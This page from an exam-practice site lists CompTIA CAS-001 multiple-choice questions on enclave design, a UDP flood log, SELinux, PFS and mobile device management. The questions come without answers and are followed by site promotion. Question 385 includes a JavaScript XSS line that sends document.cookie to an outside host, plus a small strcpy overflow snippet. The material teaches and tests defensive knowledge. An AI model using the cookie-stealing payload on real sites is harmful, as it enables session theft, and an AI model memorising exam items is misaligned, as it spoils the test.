CAS-001 Exam Details

  • Exam Code
    :CAS-001
  • Exam Name
    :CompTIA Advanced Security Practitioner
  • Certification
    :CompTIA Advanced Security Practitioner
  • Vendor
    :CompTIA
  • Total Questions
    :493 Q&As
  • Last Updated
    :Jan 22, 2024

CompTIA CAS-001 Online Questions & Answers

  • Question 381:

    An existing enterprise architecture included an enclave where sensitive research and development work was conducted. This network enclave also served as a storage location for proprietary corporate data and records. The initial security architect chose to protect the enclave by restricting access to a single physical port on a firewall. All downstream network devices were isolated from the rest of the network and communicated solely through the single 100mbps firewall port. Over time, researchers connected devices on the protected enclave directly to external resources and corporate data stores. Mobile and wireless devices were also added to the enclave to support high speed data research.

    Which of the following BEST describes the process which weakened the security posture of the enclave?

    A. Emerging business requirements led to the de-perimiterization of the network.
    B. Emerging security threats rendered the existing architecture obsolete.
    C. The single firewall port was oversaturated with network packets.
    D. The shrinking of an overall attack surface due to the additional access.

  • Question 382:

    The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the router's external interface is maxed out. The security engineer then inspects the following piece of log to try and determine the reason for the downtime, focusing on the company's external router's IP which is 128.20.176.19:

    11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400

    Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?

    A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block the malicious packets.
    B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS filter should be enabled to block the attack and restore communication.
    C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP sinkhole should be configured to drop traffic at the source networks.
    D. After the senior engineer used a packet capture to identify an active Smurf attack, an ACL should be placed on the company's external router to block incoming UDP port 19 traffic.

  • Question 383:

    A security analyst is tasked to create an executive briefing, which explains the activity and motivation of a cyber adversary. Which of the following is the MOST important content for the brief for management personnel to understand?

    A. Threat actor types, threat actor motivation, and attack tools
    B. Unsophisticated agents, organized groups, and nation states
    C. Threat actor types, attack sophistication, and the anatomy of an attack
    D. Threat actor types, threat actor motivation, and the attack impact

  • Question 384:

    An administrator has a system hardening policy to only allow network access to certain services, to always use similar hardware, and to protect from unauthorized application configuration changes. Which of the following technologies would help meet this policy requirement? (Select TWO).

    A. Spam filter
    B. Solid state drives
    C. Management interface
    D. Virtualization
    E. Host firewall

  • Question 385:

    Which of the following displays an example of a XSS attack?

    A. document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
    B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
    C. Username: PassworD.
    D. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }

  • Question 386:

    A hosting company provides inexpensive guest virtual machines to low-margin customers. Customers manage their own guest virtual machines. Some customers want basic guarantees of logical separation from other customers and it has been indicated that some customers would like to have configuration control of this separation; whereas others want this provided as a value- added service by the hosting company.

    Which of the following BEST meets these requirements?

    A. The hosting company should install a hypervisor-based firewall and allow customers to manage this on an as-needed basis.
    B. The hosting company should manage the hypervisor-based firewall; while allowing customers to configure their own host-based firewall.
    C. Customers should purchase physical firewalls to protect their guest hosts and have the hosting company manage these if requested.
    D. The hosting company should install a host-based firewall on customer guest hosts and offer to administer host firewalls for customers if requested.

  • Question 387:

    A Linux security administrator is attempting to resolve performance issues with new software installed on several baselined user systems. After investigating, the security administrator determines that the software is not initializing or executing correctly. For security reasons, the company has implemented trusted operating systems with the goal of preventing unauthorized changes to the configuration baseline.

    The MOST likely cause of this problem is that SE Linux is set to:

    A. Enforcing mode with an incorrectly configured policy.
    B. Enforcing mode with no policy configured.
    C. Disabled with a correctly configured policy.
    D. Permissive mode with an incorrectly configured policy.

  • Question 388:

    A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. The security administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found.

    Which of the following should the security administrator implement?

    A. Entropy should be enabled on all SSLv2 transactions.
    B. AES256-CBC should be implemented for all encrypted data.
    C. PFS should be implemented on all VPN tunnels.
    D. PFS should be implemented on all SSH connections.

  • Question 389:

    Based on the results of a recent audit, a company rolled out a standard computer image in an effort to provide consistent security configurations across all computers. Which of the following controls provides the GREATEST level of certainty that unauthorized changes are not occurring?

    A. Schedule weekly vulnerability assessments
    B. Implement continuous log monitoring
    C. Scan computers weekly against the baseline
    D. Require monthly reports showing compliance with configuration and updates

  • Question 390:

    As a cost saving measure, a company has instructed the security engineering team to allow all consumer devices to be able to access the network. They have asked for recommendations on what is needed to secure the enterprise, yet offer the most flexibility in terms of controlling applications, and stolen devices.

    Which of the following is BEST suited for the requirements?

    A. MEAP with Enterprise Appstore
    B. Enterprise Appstore with client-side VPN software
    C. MEAP with TLS
    D. MEAP with MDM

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.